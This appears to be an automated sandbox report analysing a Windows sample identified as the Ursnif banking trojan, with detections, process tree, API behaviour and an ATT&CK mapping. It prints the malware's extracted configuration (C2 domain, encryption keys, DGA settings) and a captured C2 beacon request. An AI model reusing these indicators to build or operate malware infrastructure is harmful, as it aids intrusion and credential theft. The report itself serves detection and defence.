Play interactive tour

Edit tour

Windows Analysis Report a3.exe

Overview

General Information

Sample Name:	a3.exe
Analysis ID:	498881
MD5:	0cc6d274cd84b593210168f51fcd38cd
SHA1:	666fc3963609f4aff528b9a32f7516feebaa6ddf
SHA256:	a3bdb9880bf419f2023e4015545c6c72835dbc5c68cd14fd81d35220bf9449fa
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Machine Learning detection for sample

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Queries the installation date of Windows

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

a3.exe (PID: 6712 cmdline: 'C:\Users\user\Desktop\a3.exe' MD5: 0CC6D274CD84B593210168F51FCD38CD)

iexplore.exe (PID: 6308 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4596 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6308 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "vM/iQI7/pNgGz6lvtI6TzQegGf2XOLfA1qF/UUWP33fhMhAMf4GRSOJmruKfOpClZgy8d4EH5nDffMSHLLCNtrR+dtN+DP25KSbfLihidE/SjbLI0hsotYZGCDBmkB8RgNy5kRipILXyv4cW0eYiLVm2e5VaCkdKBqotkaZ6t0ybzDTZn1t0o5nqHQOYtQRW", "c2_domain": ["api5.feen007.at/webstore"], "botnet": "3500", "server": "550", "serpent_key": "IpNvMMQa29KhBf3e", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: a3.exe PID: 6712	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.a3.exe.56294a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.a3.exe.4f60000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: a3.exe

Avira: detected

Found malware configuration

Show sources

Source: 00000000.00000002.576428660.0000000003410000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "vM/iQI7/pNgGz6lvtI6TzQegGf2XOLfA1qF/UUWP33fhMhAMf4GRSOJmruKfOpClZgy8d4EH5nDffMSHLLCNtrR+dtN+DP25KSbfLihidE/SjbLI0hsotYZGCDBmkB8RgNy5kRipILXyv4cW0eYiLVm2e5VaCkdKBqotkaZ6t0ybzDTZn1t0o5nqHQOYtQRW", "c2_domain": ["api5.feen007.at/webstore"], "botnet": "3500", "server": "550", "serpent_key": "IpNvMMQa29KhBf3e", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: a3.exe	Virustotal: Detection: 79%			Perma Link
Source: a3.exe	ReversingLabs: Detection: 89%

Machine Learning detection for sample

Show sources

Source: a3.exe

Joe Sandbox ML: detected

Source: 0.2.a3.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.a3.exe.400000.0.unpack	Avira: Label: TR/Crypt.Agent.dffnu
Source: 0.3.a3.exe.4e00000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.a3.exe.3410e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\a3.exe

Unpacked PE file: 0.2.a3.exe.400000.0.unpack

Source: a3.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\a3.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_04F63EED Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

0_2_04F63EED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 87.106.18.141:80

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: Joe Sandbox View	IP Address: 87.106.18.141 87.106.18.141
Source: Joe Sandbox View	IP Address: 87.106.18.141 87.106.18.141

Source: msapplication.xml0.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: {063EC3E5-27C5-11EC-90E9-ECF4BB862DED}.dat.7.dr, ~DF1728008F459C4534.TMP.7.dr	String found in binary or memory: http://api5.feen007.at/webstore/DcjIiNGkOSL0_2FzFS0SI/7PtL4T1ixNrirqXI/ZpdUtfjmbk9XGDI/gk7_2BOWav_2F
Source: msapplication.xml.7.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.7.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.7.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.7.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.7.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.dr	String found in binary or memory: http://www.youtube.com/

Source: unknown

DNS traffic detected: queries for: api5.feen007.at

Source: global traffic	HTTP traffic detected: GET /webstore/DcjIiNGkOSL0_2FzFS0SI/7PtL4T1ixNrirqXI/ZpdUtfjmbk9XGDI/gk7_2BOWav_2FtIxdS/vSo3lpggS/jgk05AsnNx5dVlLwmu_2/FAFwkzA53QftC8xz3wT/fnjkouYQNR37gBMDH6qXvg/zMFbyF4s1JmGD/y5Fu3aSV/TmUAsAO_2BZNh80x_2FL9QD/SJCaUL6t8y/cM9WgnTGqUY3ueTtK/VgEDjaagDntZ/uB1lRFThucd/4921ywV6NYjMkC/jnp_2BoOlFuQm1snVe_0A/_0DPF5OO0IeFwPM_/2FxPK7FahYNj2AP/3bZ4D9BzvVH_2BCtQdVgfC/l HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api5.feen007.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api5.feen007.atConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a3.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: 0.2.a3.exe.56294a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a3.exe.4f60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a3.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: 0.2.a3.exe.56294a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a3.exe.4f60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\Desktop\a3.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\a3.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\a3.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\a3.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\Desktop\a3.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\a3.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\a3.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: a3.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_04F6AEE4	0_2_04F6AEE4
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_04F62D68	0_2_04F62D68
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_0041C47A	0_2_0041C47A
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_0041E35E	0_2_0041E35E
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_0041CF02	0_2_0041CF02
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_0041E980	0_2_0041E980
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_0041C9BE	0_2_0041C9BE

Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_00401000 NtMapViewOfSection,	0_2_00401000
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_00401147 GetProcAddress,NtCreateSection,memset,	0_2_00401147
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_04F6104E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_04F6104E
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_04F6B105 NtQueryVirtualMemory,	0_2_04F6B105

Source: a3.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: a3.exe	Virustotal: Detection: 79%
Source: a3.exe	ReversingLabs: Detection: 89%

Source: a3.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\a3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_04F6365A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_04F6365A

Source: unknown	Process created: C:\Users\user\Desktop\a3.exe 'C:\Users\user\Desktop\a3.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6308 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6308 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Users\user\Desktop\a3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF8F568B21079AA7B9.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/14@1/1

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\a3.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\a3.exe

Unpacked PE file: 0.2.a3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\a3.exe

Unpacked PE file: 0.2.a3.exe.400000.0.unpack

Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_04F6AED3 push ecx; ret		0_2_04F6AEE3
Source: C:\Users\user\Desktop\a3.exe	Code function: 0_2_04F6ABA0 push ecx; ret		0_2_04F6ABA9

Source: initial sample

Static PE information: section name: .text entropy: 7.38003707514

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a3.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: 0.2.a3.exe.56294a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a3.exe.4f60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\a3.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\a3.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\Desktop\a3.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\a3.exe

0_2_04F63EED

Source: a3.exe, 00000000.00000002.577880943.00000000039F0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: a3.exe, 00000000.00000002.577880943.00000000039F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: a3.exe, 00000000.00000002.577880943.00000000039F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: a3.exe, 00000000.00000002.577880943.00000000039F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\a3.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

0_2_00401ED0

Source: C:\Users\user\Desktop\a3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_04F6660B cpuid

0_2_04F6660B

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_00401A35 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_00401A35

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_00419FF0 LoadLibraryExA,CreateNamedPipeA,GetVersionExA,DeactivateActCtx,WriteFile,WritePrivateProfileStructA,IsDBCSLeadByteEx,SetFileApisToOEM,TlsGetValue,GetThreadPriority,

0_2_00419FF0

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_00401497 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_00401497

Source: C:\Users\user\Desktop\a3.exe

Code function: 0_2_04F6660B wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_04F6660B

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a3.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: 0.2.a3.exe.56294a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a3.exe.4f60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a3.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: 0.2.a3.exe.56294a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a3.exe.4f60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection3	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection3	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery33	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
a3.exe	79%	Virustotal		Browse
a3.exe	89%	ReversingLabs	Win32.Trojan.MintDreidel
a3.exe	100%	Avira	TR/Crypt.Agent.dffnu
a3.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.a3.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.a3.exe.4f60000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.0.a3.exe.400000.0.unpack	100%	Avira	TR/Crypt.Agent.dffnu	Download File
0.3.a3.exe.4e00000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.a3.exe.3410e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
api5.feen007.at	0%	Virustotal		Browse
windowsupdate.s.llnwi.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://api5.feen007.at/favicon.ico	0%	Avira URL Cloud	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://api5.feen007.at/webstore/DcjIiNGkOSL0_2FzFS0SI/7PtL4T1ixNrirqXI/ZpdUtfjmbk9XGDI/gk7_2BOWav_2F	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
